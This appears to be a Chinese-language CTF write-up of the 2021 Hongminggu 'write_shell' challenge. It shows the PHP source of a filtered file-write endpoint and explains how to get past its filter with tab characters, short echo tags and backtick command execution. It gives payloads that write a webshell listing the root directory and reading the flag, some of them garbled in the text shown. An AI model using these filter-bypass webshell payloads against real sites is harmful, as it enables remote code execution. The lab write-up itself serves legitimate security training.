[红明谷CTF 2021]write_shell

打开靶机,先上源码

$output){
          $input[$key] = waf($output);  // 递归调用waf函数
      }
  }else{
      // 如果输入不是数组，则对该输入进行check函数检查
      $input = check($input);
  }
}

// 定义目录路径：基于用户的IP地址创建一个唯一的目录
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';

// 如果目录不存在，则创建该目录
if(!file_exists($dir)){
    mkdir($dir);
}

// 根据传入的action参数执行不同的操作
switch($_GET["action"] ?? "") {
    case 'pwd':
        // 如果action参数为'pwd'，则返回当前目录路径
        echo $dir;
        break;
    case 'upload':
        // 如果action参数为'upload'，则获取data参数的内容
        $data = $_GET["data"] ?? "";
        
        // 调用waf函数进行输入检查
        waf($data);
        
        // 将处理后的数据写入到指定目录下的index.php文件中
        file_put_contents("$dir" . "index.php", $data);
}
?>

先用?action=pwd查看目录，记下访问该目录，访问该目录下index.php就是我们即将写入代码的目标文件
再讲讲写入，过滤的几个关键就是空格,php,; 一个一个来
空格过滤能用%09或t来绕过，这两个符号都代表制表符，也就是平常使用的Tab键，四个空格
php主要针对php格式，换成= ?>就行了
至于;其实不用考虑 ?>会自动对最后一行起到;的作用
提一嘴php中 括起来的内容被认为是代码
构建payload:

?action=upload&data==`lst/`?>`

在根目录里找到了flag,最终payload:

?action=upload&data==`catt/flllllll1112222222lag`?>

flag{9f8b8390-ba06-4db5-a2b4-f5fbf71b6f0e}